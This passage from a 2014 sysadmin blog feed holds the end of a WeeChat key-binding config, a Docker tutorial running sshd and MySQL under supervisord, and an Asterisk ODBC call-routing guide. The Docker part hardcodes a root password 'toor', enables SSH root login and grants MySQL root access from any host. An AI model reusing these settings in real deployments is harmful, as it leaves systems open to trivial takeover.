meta2-18~ = "/window -1"  
meta2-19~ = "/window +1"  
meta2-1;3A = "/buffer -1"  
meta2-1;3B = "/buffer +1"  
meta2-1;3C = "/buffer +1"  
meta2-1;3D = "/buffer -1"  
meta2-1;3F = "/window scroll_bottom"  
meta2-1;3H = "/window scroll_top"  
meta2-1;5A = "/input history_global_previous"  
meta2-1;5B = "/input history_global_next"  
meta2-1;5C = "/input move_next_word"  
meta2-1;5D = "/input move_previous_word"  
meta2-1~ = "/input move_beginning_of_line"  
meta2-200~ = "/input paste_start"  
meta2-201~ = "/input paste_stop"  
meta2-20~ = "/bar scroll title * -30%"  
meta2-21~ = "/bar scroll title * +30%"  
meta2-23;3~ = "/bar scroll nicklist * b"  
meta2-23~ = "/bar scroll nicklist * -100%"  
meta2-24;3~ = "/bar scroll nicklist * e"  
meta2-24~ = "/bar scroll nicklist * +100%"  
meta2-3~ = "/input delete_next_char"  
meta2-4~ = "/input move_end_of_line"  
meta2-5;3~ = "/window scroll_up"  
meta2-5~ = "/window page_up"  
meta2-6;3~ = "/window scroll_down"  
meta2-6~ = "/window page_down"  
meta2-7~ = "/input move_beginning_of_line"  
meta2-8~ = "/input move_end_of_line"  
meta2-A = "/input history_previous"  
meta2-B = "/input history_next"  
meta2-C = "/input move_next_char"  
meta2-D = "/input move_previous_char"  
meta2-F = "/input move_end_of_line"  
meta2-G = "/window page_down"  
meta2-H = "/input move_beginning_of_line"  
meta2-I = "/window page_up"  
meta2-Z = "/input complete_previous"  
meta2-[E = "/buffer -1"  
meta-_ = "/input redo"  
meta-a = "/input jump_smart"  
meta-b = "/input move_previous_word"  
meta-d = "/input delete_next_word"  
meta-f = "/input move_next_word"  
meta-h = "/input hotlist_clear"  
meta-jmeta-l = "/input jump_last_buffer"  
meta-jmeta-r = "/server raw"  
meta-jmeta-s = "/server jump"  
meta-j01 = "/buffer 1"  
meta-j02 = "/buffer 2"  
meta-j03 = "/buffer 3"  
meta-j04 = "/buffer 4"  
meta-j05 = "/buffer 5"  
meta-j06 = "/buffer 6"  
meta-j07 = "/buffer 7"  
meta-j08 = "/buffer 8"  
meta-j09 = "/buffer 9"  
meta-j10 = "/buffer 10"  
meta-j11 = "/buffer 11"  
meta-j12 = "/buffer 12"  
meta-j13 = "/buffer 13"  
meta-j14 = "/buffer 14"  
meta-j15 = "/buffer 15"  
meta-j16 = "/buffer 16"  
meta-j17 = "/buffer 17"  
meta-j18 = "/buffer 18"  
meta-j19 = "/buffer 19"  
meta-j20 = "/buffer 20"  
meta-j21 = "/buffer 21"  
meta-j22 = "/buffer 22"  
meta-j23 = "/buffer 23"  
meta-j24 = "/buffer 24"  
meta-j25 = "/buffer 25"  
meta-j26 = "/buffer 26"  
meta-j27 = "/buffer 27"  
meta-j28 = "/buffer 28"  
meta-j29 = "/buffer 29"  
meta-j30 = "/buffer 30"  
meta-j31 = "/buffer 31"  
meta-j32 = "/buffer 32"  
meta-j33 = "/buffer 33"  
meta-j34 = "/buffer 34"  
meta-j35 = "/buffer 35"  
meta-j36 = "/buffer 36"  
meta-j37 = "/buffer 37"  
meta-j38 = "/buffer 38"  
meta-j39 = "/buffer 39"  
meta-j40 = "/buffer 40"  
meta-j41 = "/buffer 41"  
meta-j42 = "/buffer 42"  
meta-j43 = "/buffer 43"  
meta-j44 = "/buffer 44"  
meta-j45 = "/buffer 45"  
meta-j46 = "/buffer 46"  
meta-j47 = "/buffer 47"  
meta-j48 = "/buffer 48"  
meta-j49 = "/buffer 49"  
meta-j50 = "/buffer 50"  
meta-j51 = "/buffer 51"  
meta-j52 = "/buffer 52"  
meta-j53 = "/buffer 53"  
meta-j54 = "/buffer 54"  
meta-j55 = "/buffer 55"  
meta-j56 = "/buffer 56"  
meta-j57 = "/buffer 57"  
meta-j58 = "/buffer 58"  
meta-j59 = "/buffer 59"  
meta-j60 = "/buffer 60"  
meta-j61 = "/buffer 61"  
meta-j62 = "/buffer 62"  
meta-j63 = "/buffer 63"  
meta-j64 = "/buffer 64"  
meta-j65 = "/buffer 65"  
meta-j66 = "/buffer 66"  
meta-j67 = "/buffer 67"  
meta-j68 = "/buffer 68"  
meta-j69 = "/buffer 69"  
meta-j70 = "/buffer 70"  
meta-j71 = "/buffer 71"  
meta-j72 = "/buffer 72"  
meta-j73 = "/buffer 73"  
meta-j74 = "/buffer 74"  
meta-j75 = "/buffer 75"  
meta-j76 = "/buffer 76"  
meta-j77 = "/buffer 77"  
meta-j78 = "/buffer 78"  
meta-j79 = "/buffer 79"  
meta-j80 = "/buffer 80"  
meta-j81 = "/buffer 81"  
meta-j82 = "/buffer 82"  
meta-j83 = "/buffer 83"  
meta-j84 = "/buffer 84"  
meta-j85 = "/buffer 85"  
meta-j86 = "/buffer 86"  
meta-j87 = "/buffer 87"  
meta-j88 = "/buffer 88"  
meta-j89 = "/buffer 89"  
meta-j90 = "/buffer 90"  
meta-j91 = "/buffer 91"  
meta-j92 = "/buffer 92"  
meta-j93 = "/buffer 93"  
meta-j94 = "/buffer 94"  
meta-j95 = "/buffer 95"  
meta-j96 = "/buffer 96"  
meta-j97 = "/buffer 97"  
meta-j98 = "/buffer 98"  
meta-j99 = "/buffer 99"  
meta-k = "/input grab_key_command"  
meta-m = "/mute mouse toggle"  
meta-n = "/window scroll_next_highlight"  
meta-p = "/window scroll_previous_highlight"  
meta-r = "/input delete_line"  
meta-s = "/mute aspell toggle"  
meta-u = "/window scroll_unread"  
meta-wmeta-meta2-A = "/window up"  
meta-wmeta-meta2-B = "/window down"  
meta-wmeta-meta2-C = "/window right"  
meta-wmeta-meta2-D = "/window left"  
meta-wmeta2-1;3A = "/window up"  
meta-wmeta2-1;3B = "/window down"  
meta-wmeta2-1;3C = "/window right"  
meta-wmeta2-1;3D = "/window left"  
meta-wmeta-b = "/window balance"  
meta-wmeta-s = "/window swap"  
meta-x = "/input zoom_merged_buffer"  
meta-z = "/window zoom"  
ctrl-_ = "/input undo"

[key_search]
ctrl-I = "/input search_switch_where"  
ctrl-J = "/input search_stop"  
ctrl-M = "/input search_stop"  
ctrl-R = "/input search_switch_regex"  
meta2-A = "/input search_previous"  
meta2-B = "/input search_next"  
meta-c = "/input search_switch_case"

[key_cursor]
ctrl-J = "/cursor stop"  
ctrl-M = "/cursor stop"  
meta-meta2-A = "/cursor move area_up"  
meta-meta2-B = "/cursor move area_down"  
meta-meta2-C = "/cursor move area_right"  
meta-meta2-D = "/cursor move area_left"  
meta2-1;3A = "/cursor move area_up"  
meta2-1;3B = "/cursor move area_down"  
meta2-1;3C = "/cursor move area_right"  
meta2-1;3D = "/cursor move area_left"  
meta2-A = "/cursor move up"  
meta2-B = "/cursor move down"  
meta2-C = "/cursor move right"  
meta2-D = "/cursor move left"  
@item(buffer_nicklist):K = "/window ${_window_number};/kickban ${nick}"
@item(buffer_nicklist):b = "/window ${_window_number};/ban ${nick}"
@item(buffer_nicklist):k = "/window ${_window_number};/kick ${nick}"
@item(buffer_nicklist):q = "/window ${_window_number};/query ${nick};/cursor stop"
@item(buffer_nicklist):w = "/window ${_window_number};/whois ${nick}"
@chat:Q = "hsignal:chat_quote_time_prefix_message;/cursor stop"
@chat:m = "hsignal:chat_quote_message;/cursor stop"
@chat:q = "hsignal:chat_quote_prefix_message;/cursor stop"

[key_mouse]
@bar(input):button2 = "/input grab_mouse_area"
@bar(nicklist):button1-gesture-down = "/bar scroll nicklist ${_window_number} +100%"
@bar(nicklist):button1-gesture-down-long = "/bar scroll nicklist ${_window_number} e"
@bar(nicklist):button1-gesture-up = "/bar scroll nicklist ${_window_number} -100%"
@bar(nicklist):button1-gesture-up-long = "/bar scroll nicklist ${_window_number} b"
@chat(script.scripts):button1 = "/window ${_window_number};/script go ${_chat_line_y}"
@chat(script.scripts):button2 = "/window ${_window_number};/script go ${_chat_line_y};/script installremove -q ${script_name_with_extension}"
@chat(script.scripts):wheeldown = "/script down 5"
@chat(script.scripts):wheelup = "/script up 5"
@item(buffer_nicklist):button1 = "/window ${_window_number};/query ${nick}"
@item(buffer_nicklist):button1-gesture-left = "/window ${_window_number};/kick ${nick}"
@item(buffer_nicklist):button1-gesture-left-long = "/window ${_window_number};/kickban ${nick}"
@item(buffer_nicklist):button2 = "/window ${_window_number};/whois ${nick}"
@item(buffer_nicklist):button2-gesture-left = "/window ${_window_number};/ban ${nick}"
@bar:wheeldown = "/bar scroll ${_bar_name} ${_window_number} +20%"
@bar:wheelup = "/bar scroll ${_bar_name} ${_window_number} -20%"
@chat:button1 = "/window ${_window_number}"
@chat:button1-gesture-left = "/window ${_window_number};/buffer -1"
@chat:button1-gesture-left-long = "/window ${_window_number};/buffer 1"
@chat:button1-gesture-right = "/window ${_window_number};/buffer +1"
@chat:button1-gesture-right-long = "/window ${_window_number};/input jump_last_buffer"
@chat:ctrl-wheeldown = "/window scroll_horiz -window ${_window_number} +10%"
@chat:ctrl-wheelup = "/window scroll_horiz -window ${_window_number} -10%"
@chat:wheeldown = "/window scroll_down -window ${_window_number}"
@chat:wheelup = "/window scroll_up -window ${_window_number}"
@*:button3 = "/cursor go ${_x},${_y}"
</code></pre>

<style>img.middlecenter{display:block;margin:0 auto;max-height:450px;width:auto}</style>]]></description><link>http://blog.roundside.com/weechat-ncurses-based-irc-client/</link><guid isPermaLink="false">0d913f7f-7b40-4168-943a-cdda3bd7d603</guid><category><![CDATA[linux]]></category><category><![CDATA[irc]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Tue, 18 Nov 2014 22:10:17 GMT</pubDate></item><item><title><![CDATA[Running multiple services in Docker container]]></title><description><![CDATA[<p><img class="middlecenter" src='http://files.roundside.com/content/docker-whale-home-logo.png' > <br />
<a href='https://www.docker.com/' >Docker</a> is amazing for application testing, or whenever we need to run something in an isolated environment.</p>

<p>But sometimes we need to run <strong>daemons</strong> (such as sshd or nginx), and that's where the problems begin: in Docker's ideology, when the main process finishes, the container stops. This is fine for a single application: we run some code, see the results, and the container stops. <br />
So, is there a solution? Yes, and the answer is <a href='https://docs.docker.com/articles/using_supervisord/' >supervisord</a>.</p>

<p>It's a python-based tool for controlling processes (including restarting them on crash, and much more).</p>

<p>In a nutshell, it acts as something like init for our container; supervisor has a well-documented <a href='http://supervisord.org/configuration.html' >manual</a> for its config files.</p>
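<p>For example, restart behavior can be tuned per program. A hedged sketch using option names from the supervisor manual (the program name and values are illustrative, not from this article):</p>

<pre><code class="language-bash">[program:mydaemon]
command=/usr/sbin/mydaemon -D
autorestart=true     ; restart the process whenever it exits unexpectedly
startretries=3       ; give up after 3 failed starts in a row
stdout_logfile=/var/log/supervisor/mydaemon.log
</code></pre>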

<p>Ok, it's game time!</p>

<p><em>I'm using Gentoo (3.16.2 kernel) and Docker 1.2.0 in this example</em></p>

<p>Let's create a container for the sshd service and build it using the <code>docker build</code> command.</p>

<p>Create a temporary directory and write the config files there:</p>

<pre><code class="language-bash">[sloun@heaven ~ ] cd $(mktemp -d)
</code></pre>
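<p><code>mktemp -d</code> creates a unique temporary directory and prints its path, so the one-liner above drops us straight into a clean scratch dir:</p>

<pre><code class="language-bash">dir=$(mktemp -d)   # e.g. /tmp/tmp.Fvl9y73yhl
ls -ld "$dir"      # a fresh, empty directory owned by us
rmdir "$dir"       # remove the demo directory again
</code></pre>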

<p>In the Dockerfile I'll specify which packages need to be installed, and which directories need to be created for sshd:</p>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] cat Dockerfile
# vim: set syntax=dockerfile:
#sshd template
FROM debian:stable  
MAINTAINER sloun@roundside  
RUN apt-get update &amp;&amp; apt-get -y upgrade \  
&amp;&amp; apt-get -y install openssh-server supervisor \
&amp;&amp; echo 'root:toor' | chpasswd \
&amp;&amp; sed -i 's/PermitRootLogin without-password/PermitRootLogin yes/' /etc/ssh/sshd_config\
&amp;&amp; mkdir /var/run/supervisor &amp;&amp; mkdir /var/run/sshd 
#supervisord config
COPY supervisord.conf /etc/supervisor/conf.d/supervisord.conf  
EXPOSE 22  
CMD ["/usr/bin/supervisord"]
</code></pre>

<p>Now in detail:  </p>

<ul>
<li>use the debian stable (wheezy, at the time of writing) template  </li>
<li>specify the maintainer of the template  </li>
<li>update &amp; upgrade packages to the latest versions  </li>
<li>set 'toor' as the root password</li>
<li>if root login is not allowed, fix it using sed</li>
<li>copy supervisord.conf to /etc/supervisor/conf.d/</li>
<li>expose port 22 (more about that below)</li>
<li>run supervisord</li>
</ul>

<p>The reason to use <code>EXPOSE</code> is to make this port available <strong>in</strong> the container immediately. Without exposing the port, sshd will still become reachable, but it can take some time (up to a minute!). Read more about this <a href='https://docs.docker.com/reference/run/#expose-incoming-ports'>here</a>.</p>

<p>Now, create the config file for supervisor (supervisord.conf); a simple config for <strong>sshd</strong> looks like this:  </p>

<pre><code class="language-bash">[supervisord]
nodaemon=true

[program:sshd]
command=/usr/sbin/sshd -D  
</code></pre>

<p>Ok. We have Dockerfile and supervisord.conf in the directory:  </p>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] l
total 8  
-rw-r--r-- 1 sloun sloun 706 Nov 18 03:36 Dockerfile
-rw-r--r-- 1 sloun sloun 166 Nov 18 03:14 supervisord.conf
</code></pre>

<p>Time to build the image:  </p>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] docker build -t debian:sshd .
</code></pre>

<blockquote>
  <p>about tag </p>
</blockquote>

<p>The -t option tags the image with a repository name (and optional tag), here <code>debian:sshd</code></p>

<p>That's all. Start the container and map a local port into it:  </p>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] docker run -d -p 127.0.0.1:1030:22 debian:sshd
</code></pre>

<p>sshd is now available at 127.0.0.1:1030 (e.g. <code>ssh -p 1030 root@127.0.0.1</code>)</p>

<h3 id="mysqldandsshdinonecontainer">Mysqld and sshd in one container</h3>

<p>Running mysql this way is also very easy, but there are some pitfalls:</p>

<ul>
<li>mysqld binds to loopback only by default</li>
<li>there are no users configured by default</li>
<li>remote root login is forbidden  </li>
</ul>

<p>So, my simplest <strong>Dockerfile</strong> looks like this:   </p>

<pre><code class="language-bash"># vim: set syntax=dockerfile:
#sshd-mysqld template
FROM debian:stable  
MAINTAINER sloun@roundside  
RUN apt-get update &amp;&amp; apt-get -y upgrade \  
&amp;&amp; apt-get -y install openssh-server mysql-server supervisor \
&amp;&amp; echo 'root:toor' | chpasswd \
&amp;&amp; sed -i 's/PermitRootLogin without-password/PermitRootLogin yes/' /etc/ssh/sshd_config \
&amp;&amp; sed -i 's/bind-address.\+/bind-address=0.0.0.0/' /etc/mysql/my.cnf \
&amp;&amp; mkdir /var/run/supervisor &amp;&amp; mkdir /var/run/sshd
#supervisord config
COPY ./supervisord.conf /etc/supervisor/conf.d/supervisord.conf  
#ports
EXPOSE 22  
EXPOSE 3306  
#stuff for mysql
COPY ./mysql.sh /opt/mysql.sh  
#run supervisord
CMD ["/usr/bin/supervisord"]  
</code></pre>

<ul>
<li>First, bind mysqld on all available interfaces using sed</li>
<li>expose the mysqld port</li>
<li>add a little shell script (<strong>mysql.sh, must be executable</strong>) that enables remote root login</li>
</ul>
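<p>The bind-address substitution can be sanity-checked locally before baking it into the image (the sample line mimics a stock Debian my.cnf; GNU sed assumed):</p>

<pre><code class="language-bash"># a sample line as shipped in a stock Debian my.cnf (illustrative)
line='bind-address            = 127.0.0.1'
# the exact substitution from the Dockerfile
echo "$line" | sed 's/bind-address.\+/bind-address=0.0.0.0/'
# prints: bind-address=0.0.0.0
</code></pre>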

<p><strong>mysql.sh:</strong></p>

<pre><code>#!/usr/bin/env bash
echo "GRANT ALL ON *.* TO root@'%' IDENTIFIED BY 'toor' WITH GRANT OPTION; FLUSH PRIVILEGES" | mysql  
</code></pre>

<p>And updated <strong>supervisord.conf:</strong>  </p>

<pre><code class="language-bash">[supervisord]
nodaemon=true

[program:sshd]
command=/usr/sbin/sshd -D

[program:mysqld]
command=/usr/bin/mysqld_safe

[program:mysql-configure]
command=/opt/mysql.sh
</code></pre>
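<p>One caveat worth hedging on: supervisord starts all programs concurrently, so mysql.sh may fire before mysqld accepts connections. The supervisor manual offers <code>priority</code> (lower starts first), <code>startsecs</code> and <code>startretries</code> to work around this; a sketch (values are illustrative):</p>

<pre><code class="language-bash">[program:mysqld]
command=/usr/bin/mysqld_safe
priority=1           ; start before the configure one-shot

[program:mysql-configure]
command=/opt/mysql.sh
priority=2
startsecs=0          ; a quick exit still counts as success
startretries=10      ; retry while mysqld is still warming up
autorestart=false    ; one-shot: don't restart after it succeeds
</code></pre>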

<p>Build and run:</p>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] docker build -t debian:sshd_mysqld .
</code></pre>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] docker run -d -p 127.0.0.1:1040:22 -p 127.0.0.1:1041:3306 debian:sshd_mysqld
</code></pre>

<p><br />
Look at the output of <code>docker ps</code>:  </p>

<pre><code class="language-bash">[sloun@heaven /tmp/tmp.Fvl9y73yhl ] docker ps
CONTAINER ID        IMAGE               COMMAND                CREATED             STATUS              PORTS                                              NAMES  
9e197bc92b64        debian:sshd_mysqld    "/usr/bin/supervisor   30 minutes ago      Up 30 minutes       127.0.0.1:1040-&gt;22/tcp, 127.0.0.1:1041-&gt;3306/tcp   insane_franklin  
</code></pre>

<p>Now, mysql root login is available at 127.0.0.1:1041, and ssh at 127.0.0.1:1040.</p>

<p><a href='https://docs.docker.com/userguide/dockerlinks/' >Linking</a> containers together also works nicely for this!</p>

<p>Thanks to <a href='http://txt.fliglio.com/2013/11/creating-a-mysql-docker-container/' >http://txt.fliglio.com/2013/11/creating-a-mysql-docker-container/</a></p>

<style>img.middlecenter{display:block;margin:0 auto;max-height:450px;width:auto}</style>]]></description><link>http://blog.roundside.com/running-miltiple-services-in-docker-container/</link><guid isPermaLink="false">04e29239-a202-4fd6-928d-3ca2ef462cb6</guid><category><![CDATA[virtualization]]></category><category><![CDATA[linux]]></category><category><![CDATA[containers]]></category><category><![CDATA[docker]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Mon, 17 Nov 2014 14:15:00 GMT</pubDate></item><item><title><![CDATA[Smart calls routing in Asterisk (using mysql or postgresql via odbc)]]></title><description><![CDATA[<p><img style="height:200px;width:auto;margin:0 auto;display:block" src='http://files.roundside.com/content/Asterisk_Logo.png' > <br />
Good day, dear all!</p>

<p>I think it's very useful when certain calls go to certain peers (i.e. a manager or support team department). <br />
For example, when your friend Alice calls your bungalow-office, only your phone (pc/laptop) should ring. <br />
That's not so hard with asterisk and your favorite DB (I'll try it with mysql). <br />
So, all we need is:</p>

<ul>
<li>Asterisk  </li>
<li>[your favorite] *nix distro  </li>
<li>unixodbc  </li>
<li>libmyodbc - for mysql  </li>
<li>odbc-postgresql - for postgresql</li>
<li>brain  </li>
</ul>

<p><a href='http://en.wikipedia.org/wiki/Open_Database_Connectivity' >ODBC</a> (Open Database Connectivity) is something like a high-level API for relational DBs. Maybe it's a little bit old, but it just works.</p>

<p>Besides, there is an Asterisk mysql addon for direct mysql connections (with limited functionality), but odbc is much more powerful and flexible.</p>

<p>Ok. After the odbc stuff is installed, it's time to configure the connection parameters:</p>

<h3 id="odbcpart">Odbc part:</h3>

<p><strong>/etc/odbc.ini</strong> stores the DB credentials and connection options: <br />
(<strong>Note</strong>: you may specify credentials and options in <strong>res_odbc.conf</strong> instead, especially if you have multiple databases and want to keep everything in one place)</p>

<pre><code class="language-bash">[asterisk_server_db]
Driver       = MySQL  
Description  = MySQL ODBC 3.51 Driver DSN  
Server       = 127.1  
Port         = 3306  
User         = justin  
Password     = nobodyknowsmypassword  
Database     = bieber  
Option       = 3  
Socket       =  
</code></pre>

<p><strong>/etc/odbcinst.ini</strong> <br />
must contain the driver library locations (these depend on the distro):  </p>

<pre><code class="language-bash">[MySQL]
Description     = MySQL driver  
Driver          = libmyodbc.so  
Setup           = libodbcmyS.so  
CPTimeout       =  
CPReuse         =
</code></pre>

<p><br />
Check connection to database:  </p>

<pre><code class="language-bash">[root@some:~] isql asterisk_server_db
</code></pre>

<p>if you see this  </p>

<pre><code class="language-bash">+---------------------------------------+
| Connected!                            |
|                                       |
| sql-statement                         |
| help [tablename]                      |
| quit                                  |
|                                       |
+---------------------------------------+
SQL&gt;  
</code></pre>

<p>then everything is fine (try making some requests to the DB too), and it's time to configure the connection from Asterisk.</p>

<h3 id="asteriskpart">Asterisk part:</h3>

<p>Set database(s) for Asterisk odbc resources: <br />
<strong>/etc/asterisk/res_odbc.conf</strong></p>

<pre><code>[asterisk_db]
enabled=&gt;yes  
dsn=&gt;asterisk_server_db  
pooling=&gt;no  
pre-connect=&gt;yes
</code></pre>

<blockquote>
  <p>dsn  </p>
</blockquote>

<p><em>is the data source name defined in /etc/odbc.ini</em></p>

<blockquote>
  <p>pre-connect  </p>
</blockquote>

<p><em>is recommended to reduce request latency</em>  </p>

<p>also, <strong>connection credentials can be specified</strong> in this file instead of /etc/odbc.ini</p>

<p>Now, it's time to set up the functions that we will later call from the dialplan: <br />
<strong>/etc/asterisk/func_odbc.conf</strong></p>

<pre><code class="language-bash">[MANAGER_STATE]
prefix=check  
dsn=asterisk_db  
readsql = SELECT `users` FROM `all` WHERE `TEL` LIKE REPLACE('${ARG1}', '+1', '') LIMIT 1
</code></pre>

<blockquote>
  <p>prefix</p>
</blockquote>

<p>is optional, but it's good for human-friendly naming. With this prefix our function will be called <strong>check_MANAGER_STATE</strong> instead of the default <strong>ODBC_MANAGER_STATE</strong>  </p>

<blockquote>
  <p>dsn  </p>
</blockquote>

<p>is the resource from res_odbc.conf</p>

<p>and  </p>

<blockquote>
  <p>readsql  </p>
</blockquote>

<p>is one of the two operation modes (the other is writesql)</p>

<p>Now it's time to play with the dialplan:</p>

<pre><code class="language-bash">exten =&gt; 106,1,Set(Check_manager=${check_MANAGER_STATE(${CALLERID(num)})})  
exten =&gt; 106,n,Set(DialTarget=${IF($[${LEN(${Check_manager})} != 0]?Sip/${Check_manager}:${DIALALL})})  
exten =&gt; 106,n,Dial(${DialTarget})  
exten =&gt; 106,n,Playback(${NBAV})  
exten =&gt; 106,n,Hangup()  
</code></pre>

<p>Suppose our number is 106 (Alice's number is +10XXXXXXXXXXXXXX). Before the Dial application runs, the Asterisk function queries the table <code>all</code> and searches for the CID in the column <code>TEL</code> (the REPLACE() call strips the +1 country code if present).  </p>

<pre><code class="language-bash">+--------+-----------------+
| users  | TEL             |
+--------+-----------------+
| 106    | 0XXXXXXXXXXXXXX |
+--------+-----------------+
</code></pre>
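<p>The same '+1'-stripping can be sanity-checked in the shell; bash parameter expansion here is just a stand-in for the SQL REPLACE():</p>

<pre><code class="language-bash"># bash equivalent of REPLACE(cid, '+1', ''): drop the country code
cid='+10XXXXXXXXXXXXXX'
echo "${cid/+1/}"
# prints: 0XXXXXXXXXXXXXX
</code></pre>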

<p>If there is a user in the <code>users</code> column with the corresponding CID in the <code>TEL</code> column, that user is saved in the <code>Check_manager</code> variable and the call goes to them. <br />
We also have a check that a user was actually found:  </p>

<pre><code class="language-bash">106,n,Set(DialTarget=${IF($[${LEN(${Check_manager})} != 0]?Sip/${Check_manager}:${DIALALL})})  
</code></pre>

<p>If <strong>no user was found</strong>, <code>${LEN(${Check_manager})}</code> (the length of the variable) returns zero and <strong>DialTarget</strong> takes the <strong>DIALALL</strong> value (a call to all available peers, for example).</p>
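<p>The IF/LEN fallback can be sketched as plain shell (the peer names here are made up, not from the dialplan above):</p>

<pre><code class="language-bash"># what check_MANAGER_STATE returned; empty means no match in the DB
Check_manager=""
# illustrative fallback dial string
DIALALL="SIP/office-all"
if [ -n "$Check_manager" ]; then
  DialTarget="SIP/$Check_manager"
else
  DialTarget="$DIALALL"
fi
echo "$DialTarget"
# prints: SIP/office-all
</code></pre>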

<p><strong>Sure, this is an extra-basic example. There is plenty of room for ideas about Asterisk interactivity and much more.</strong></p>]]></description><link>http://blog.roundside.com/smart-call-routing-in-asterisk-using-mysql-or-postgresql-via-odbc/</link><guid isPermaLink="false">452af868-5779-4703-8ff9-2d2de29227ed</guid><category><![CDATA[linux]]></category><category><![CDATA[asterisk]]></category><category><![CDATA[voip]]></category><category><![CDATA[sql]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Wed, 12 Nov 2014 21:21:51 GMT</pubDate></item></channel></rss>